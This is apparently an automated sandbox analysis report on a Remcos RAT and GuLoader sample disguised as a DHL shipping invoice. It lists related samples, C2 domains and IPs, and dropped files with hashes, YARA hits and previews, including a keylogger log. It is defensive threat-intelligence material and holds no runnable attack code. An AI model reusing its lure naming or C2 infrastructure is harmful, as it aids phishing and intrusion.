                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  teldrum.roz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  wealthabundance01.duckdns.orgz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.196
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.204
                                                                                                                                                                                                                  geoplugin.netz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  RTDBucharestRomaniaROz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 92.87.162.218
                                                                                                                                                                                                                  z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 89.122.79.113
                                                                                                                                                                                                                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 92.87.250.226
                                                                                                                                                                                                                  Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 89.122.79.118
                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 92.86.6.236
                                                                                                                                                                                                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 86.35.171.85
                                                                                                                                                                                                                  kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 89.122.79.100
                                                                                                                                                                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 92.83.7.112
                                                                                                                                                                                                                  SOFTLAYERUSz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.196
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.204
                                                                                                                                                                                                                  miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 165.192.65.222
                                                                                                                                                                                                                  miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 159.122.175.31
                                                                                                                                                                                                                  sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 169.60.29.133
                                                                                                                                                                                                                  miori.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 169.52.242.203
                                                                                                                                                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 209.62.54.186
                                                                                                                                                                                                                  http://gleapis.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 52.116.53.155
                                                                                                                                                                                                                  z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 150.239.155.45
                                                                                                                                                                                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 174.132.184.239
                                                                                                                                                                                                                  ATOM86-ASATOM86NLz58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dllKO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                  YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                                                                                    Entropy (8bit):3.411480424648373
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:rglsulXfWldlNUlxql55JWRal2Jl+7R0DAlBG4moojklovDl6v:MlsqulnNUlxql55YcIeeDAlS1gWAv
                                                                                                                                                                                                                                    MD5:AA2D5D13DA07CE2503F4EA36ED1F5889
                                                                                                                                                                                                                                    SHA1:2AD631420C6106752D5344F75B01F97651FD4A6B
                                                                                                                                                                                                                                    SHA-256:E23D8C05555B553586D8C907EBFDA3B30AEA42A36194E57A0C7AC1ABC42ED662
                                                                                                                                                                                                                                    SHA-512:4DE7AFF6EFE87FD85C264871302F83957EB39F1C76CABBE93145E98914B5AE8C85CF581E3BF9094B296B3B3E7F1239F013008FC579F29695C6DEB56C4C598C45
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:....[.2.0.2.5./.0.1./.0.9. .0.2.:.3.8.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                    Entropy (8bit):4.99804230137055
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:tkBUMnd6UGkMyGWKyGXPVGArwY3bMJma5HZJmGRArpv/mOAaNO+ao9W7iN5zzkwY:qDdVauKyGX85MvXhNlT3/7HAhYro
                                                                                                                                                                                                                                    MD5:031F90780765002573DFFE4FD079B194
                                                                                                                                                                                                                                    SHA1:4950FC33809295D8A913D47953BA98D1B9BF8D72
                                                                                                                                                                                                                                    SHA-256:445D6E9235B10CD2B426678A160BC01CA0FDC5BDD45C35EB14CBB8EBF7AEFE71
                                                                                                                                                                                                                                    SHA-512:7D90C92437760FC5DDE859EEE0854835EDF87C82AF10261029F11A803C5843F6D0CE9C696A39C3EE190711FFA95E55A7172C1D8F0F19EDFC6471228E3DC1E7C1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"185.246.209.154",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Chicago",. "geoplugin_region":"Illinois",. "geoplugin_regionCode":"IL",. "geoplugin_regionName":"Illinois",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"602",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"41.871",. "geoplugin_longitude":"-87.6289",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):173644
                                                                                                                                                                                                                                    Entropy (8bit):4.604565799329235
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:q0tzOnbU0Aaa/V6Zk+0RRnDfcPL+uSPyg7BIxgv9S:q0ZOAvcp5PLqpexgvA
                                                                                                                                                                                                                                    MD5:5B3DF8436D091B59E8C3F11130FB0FC8
                                                                                                                                                                                                                                    SHA1:8D6AE6E79E039E0FE9E5EEBD9A66DB3567785B51
                                                                                                                                                                                                                                    SHA-256:14E5190C91AD97F6A4EC03B50B1E0BB1FFC7C9B968F33C4BDC3D9D9B742976E8
                                                                                                                                                                                                                                    SHA-512:9399D9FF873A76DF3F205D89158B093E685102A3CE558B6F06A5EDCDFBE2EC67E7C7E8B763A28DAF75208EA09780DF6EDCAE9B13C51662F426A554B92DBA3A71
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:..ttt.............***....X..............--.....{.......................ee.......*.?............OO.......gg...........................................**....??........+++++........2222222222...!!!..............z.....a.....888......2....................X.........3.qqq..................................N.oo....L.......V..g.qqq.sss.....m...........c........\......$................................22.........w........P.fffff..................vv...........\...................ww..........B....{{.........ff.nnnn............................8.........K..mmm........AAAA....6.`.......aaa.n....QQQ...................8......??.........................................2.D.PPP..zz..7....{{...}..>..*..................,........BBB....................PPP.p.......\\\\...B............................N.........................................&...............ttt................g.....L.....O..kk.!.F.........Y......=.!!..>.................VV.)...V...;..44..`..........==..M.....#..k.............................r....
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) \376\376\376\376, numeric, rows 36494, columns 3233857728
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):332054
                                                                                                                                                                                                                                    Entropy (8bit):7.578249290217776
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:2Fltsrea3kjbw52a0SSxoD9gvHS7kaC+QcwwVfnJo134KGgLroal:27txa0452apc/SfQcwwN6VGgLrf
                                                                                                                                                                                                                                    MD5:D877F72AAAAC187E43BE4DA409B54EB9
                                                                                                                                                                                                                                    SHA1:1BF3C844E2C04D3ACD91F09481FC3F9B013E13D6
                                                                                                                                                                                                                                    SHA-256:9D3D95BCFDAFCA3F59BF336A34FE6439EE318888C8071AFC8D9CC0A303CDF495
                                                                                                                                                                                                                                    SHA-512:5DFA7184814D2E4DD4FDDE52DF4A7AEF247D93FBAE1BA9ED3873BFC1C89561B9589F95241F49AFC681CF17AE4460072B026CFC703158499F715C1D53BD55AE4C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:............................. ..QQQQQ.>.................ssss...ii...........44..c................."....{..pppp...........,.)).$$$.O..............?.......rr....\\\.............!.^.III..............................J.II...ooo.dd.^.f.....QQ......::....XX.....bb..............................BB.......44......7...p.......y...).........ooo.........a.U..............mmmmm...`........<....cccccc..N.........................................................S...A.......................G..999...```....&&......... ....T.OO..................r...................9999............................E.................!..^^.........Y...................##...................F.............. .....................F...........k......999..I...X...........I......\\\\.....?.........U....C........................}...................""".8........ff..f...........m.............EE.*....................................hh...0......nnn..................[........rrrr.PP...222.....????.................`.....CCCC....W........-.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):62355
                                                                                                                                                                                                                                    Entropy (8bit):1.258826482536988
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:MW0KDb3KVOw/j7X+S0KA0ArEsyiOYl3fVXdYJE7udSAzJObdxbYxJ6aV:r08OVd/n0KA5YcZdYmudvQpxboJxV
                                                                                                                                                                                                                                    MD5:525837D7C36E52AE3BC6211BCCBF5EA1
                                                                                                                                                                                                                                    SHA1:37850DC35FBD8485D5E1A2AF97EC82F51AEA20DD
                                                                                                                                                                                                                                    SHA-256:5A4BD2EE31A482045C32C9C9959349AF8B9A25AA0802733353CE8B109FE0F9E2
                                                                                                                                                                                                                                    SHA-512:07762F5FAB9A7A2A71EE3C63FBF5447EC2E21C9D7445452124B3F392742763533D8C5C13D57D3EF10D72D18DDA7D0D69903C2F0F89665F78C198C19BC2324592
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:............................................Z..................................................................................R...........D...................................................-........................................._........t.............................U...........................................................................................6............N.........q.................................................................................................._.d................"................................................=.........................................................z.....e.............!............)....................................O.............................................................C.....E.............................3..................................................I..................t.........k........0...P........<..............]...........................4........................................w..........................d......
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):485505
                                                                                                                                                                                                                                    Entropy (8bit):1.2528129101207983
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:EVa8YX2OjjNzeeS9xrLyC0EOUz5teMpuzfAwf03J:EVhOj+nrgMGfAwfOJ
                                                                                                                                                                                                                                    MD5:555D5C56BDD2315465BECC10397D5764
                                                                                                                                                                                                                                    SHA1:955DFA2743CC2B49DC493C23C1BC8CB0FF21E6C8
                                                                                                                                                                                                                                    SHA-256:D81040FF324DC02AE272F7B3EC644F5D988539648C9459B4669C92C95EB8F83B
                                                                                                                                                                                                                                    SHA-512:8477D70481A576EA3BB2123A3114A3E4C6E5DD3D9A461CED29B63727E71289BEC6982C2B5D59559C15AC875E004872855D90E74999069D2B6E1C1E09C8D13937
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...............................3...........................%.....z....................<......................................................6.........................7.....>............................].....A...............w......".................l.T..............................................................B........./.i......................................................................................................+..T...........................................~..........8........................[..................................9...................................%...........................................................F................E.......................................................v....................................;.....................................................r..............................................d...................................u.-........................:.8.....>9.......................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):336216
                                                                                                                                                                                                                                    Entropy (8bit):1.2639133058786656
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:NzYP1DovnbTLlQx1bwZqqOkw26hthJhXKJ639+HFf8TCoDrT6lmudk5e7rfWC07A:LBG2dqxIJVo6rJIhwTf764dpzz
                                                                                                                                                                                                                                    MD5:3D6D953D11FDDE966CDA116E27C6BB2F
                                                                                                                                                                                                                                    SHA1:FD0779E2A60E03EEE4EF2B21DA200A4DEFC549D0
                                                                                                                                                                                                                                    SHA-256:28B4FF5BDCC66D02A0B19325797AB0EBD58C78D29180DA993FB1551B0650A414
                                                                                                                                                                                                                                    SHA-512:8302C8DB0BF42DFDA96B6DA42BDA8B189D65AB6A5D2C769B6D9F3A347DD09EA6FDA94CACE00B455810348E02DBD390F1CB406A33E8C846C6D453408F22F5518A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.....p.........[.............g..................]....5......................................u.................................z..........A.*.........................S.d.....................................................s....................................................................8..............................................................x.......................1........j................................................y...P...............................................................F...........X............................>............................................*.....U................................`...................#............p.............%.......................#....................#....................?...........................>..............9..........................................................................................{........................................................................J...................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):764339
                                                                                                                                                                                                                                    Entropy (8bit):7.665655342643962
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:gSsoaNkT5nJ2CDKyunOwmxfydcitSooK0uTddwDAvJaDpuhFQp3nZoThK:gxCnJ7DKZnO5xPK02dYDpmQp3nZac
                                                                                                                                                                                                                                    MD5:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    SHA1:7577219DFEDAAEDFF8B10DC274B97CFF0F2788FB
                                                                                                                                                                                                                                    SHA-256:148B1248F6B89FA446D40890492BF0F9DDDFA0B17D1CB9CAD9FD84A0F9934890
                                                                                                                                                                                                                                    SHA-512:CB73D6E402C985060FA29F19CD8A9C5969FEA907BE08DACE163D30994849EEC6DA053822959E9B0D2F9E2AAC5435381FBEF47A6E04CD16E4DF038059BA266D04
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...........3............@.......................................@..........................................0..............................................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata.......P...........................rsrc.......0......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                                                    Entropy (8bit):4.0536606896881855
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                                                                                                                                                                                    MD5:08CA75DA54EB4810D18796C97F510A55
                                                                                                                                                                                                                                    SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                                                                                                                                                                                    SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                                                                                                                                                                                    SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[Bus Clock]..Gats=Galse..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb3f793b3, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):24117248
                                                                                                                                                                                                                                    Entropy (8bit):1.3004104122286764
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:pjJNePLB6AM0GPNvT2TIT0hocTvvLWtWJMF:RJhICtJF
                                                                                                                                                                                                                                    MD5:E7542399987FF04D91D747A1024C6EB8
                                                                                                                                                                                                                                    SHA1:E769DFCCBFD363F9F21E5CD5B40DBC2FA32B26E6
                                                                                                                                                                                                                                    SHA-256:1112D55B9114E69311B1A8689EBD5837C6634EBBB926B37EE8D4690A470D6CC5
                                                                                                                                                                                                                                    SHA-512:5E29F58324CF48D6F0F78C71CD3DEC4149E75339CB243A3D3B1732348DFE6179AB5CA5D90D28352B33CD42F58BB13ACC7B132146074742C546268F9D352EBE36
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:....... ........V......I.... ...{........................A......%...}C..%...}..h.C..........................v&.. ...{..............................................................................................w...........bJ......n........................................................................................................... .......'5...}..............................................................................................................................................................................................8....|9.................................A.'..%...}...................Pql.%...}...........................#......h.C.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):720
                                                                                                                                                                                                                                    Entropy (8bit):3.666887822821003
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:xQ4lA2++ugypjBQMPURR0FlL660q3awm4Q3DA0FlL660q3awm49Hz/0aimi:7a2+SDH0/L6q5DQTA0/L6q5D9Aait
                                                                                                                                                                                                                                    MD5:0FBE36200F4CE196FE88A7AAB2EBA0A3
                                                                                                                                                                                                                                    SHA1:B13401E9544F6EEB01F464CCBE5DC13A8613DCF2
                                                                                                                                                                                                                                    SHA-256:70B280935EF2C5D3F5A5BDCC39B5F38AA637B19A129FAE14367A5E0225328D86
                                                                                                                                                                                                                                    SHA-512:B0BC88390CB521BA7FDBAF8E6F389427C938D3C6C33B2A5B5858C3C40BFEA21D0F960546B4DF516E49882439E905CF0477D22B6AB6B36A5D58FBFE92152B5749
                                                                                                                                                                                                                                    Malicious:true
